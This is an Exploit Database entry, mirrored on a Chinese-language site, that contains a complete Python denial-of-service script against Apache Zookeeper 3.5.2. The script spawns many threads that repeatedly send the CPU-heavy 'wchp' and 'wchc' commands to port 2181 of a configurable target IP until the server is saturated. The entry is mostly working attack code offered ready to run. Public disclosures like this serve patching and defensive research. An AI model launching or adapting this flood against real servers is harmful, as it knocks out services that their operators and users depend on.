Zookeeper 3.5.2 Client – Denial of Service

• Exploit Database
• 125 阅读

• 作者： Brandon Dennis
  日期： 2017-07-02
• 类别：

  • dos
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/42294/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86

  #!/usr/bin/python   # Exploit Title: Zookeeper Client Denial Of Service (Port 2181) # Date: 2/7/2017 # Exploit Author: Brandon Dennis # Email: bdennis@mail.hodges.edu # Software Link: http://zookeeper.apache.org/releases.html#download # Zookeeper Version: 3.5.2 # Tested on: Windows 2008 R2, Windows 2012 R2 x64 & x86 # Description: The wchp command to the ZK port 2181 will gather open internal files by each session/watcher and organize them for the requesting client. # This command is CPU intensive and will cause a denial of service to the port as well as spike the CPU of the remote machine to 90-100% consistently before any other traffic. # The average amount of threads uses was 10000 for testing. This should work on all 3.x+ versions of Zookeeper. # This should effect Linux x86 & x64 as well       import time import os import threading import sys import socket   numOfThreads = 1 exitStr = "n" stop_threads = False threads = [] ipAddress = "192.168.1.5" #Change this port = 2181   def sendCommand(ipAddress, port): try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((ipAddress, port)) s.send("wchp\r".encode("utf-8")) s.recv(1024) s.send("wchc\r".encode("utf-8")) s.close() except: pass   def runCMD(id, stop, ipAddress, port): while True: sendCommand(ipAddress, port) if stop(): break return def welcomeBanner(): banner = """ _______ _______ _ |___| | / / /__ \ | | / /| |/ /| /\/_ __ __ _ ___| |__ ___ _ __ / / |\| | | '__/ _` / __| '_ \ / _ | '__| ./ /__| |\\ | \__/| | | (_| \__ | | | |__| | \_____\_| \_/\____|_|\__,_|___|_| |_|\___|_| By: Brandon Dennis Email: bdennis@mail.hodges.edu """ print(banner)   welcomeBanner() numOfThreads = int(input("How many threads do you want to use: ")) print ("Startin Up Threads...") for i in range(numOfThreads): t = threading.Thread(target=runCMD, args=(id, lambda: stop_threads, ipAddress, port)) threads.append(t) t.start() print("Threads are now started...")   while exitStr != "y": inpt = input("Do you wish to stop threads(y): ") if inpt == "y": exitStr = "y"   print("\nStopping Threads...") stop_threads = True for thread in threads: thread.join() print("Threads are now stopped...") sys.exit(0);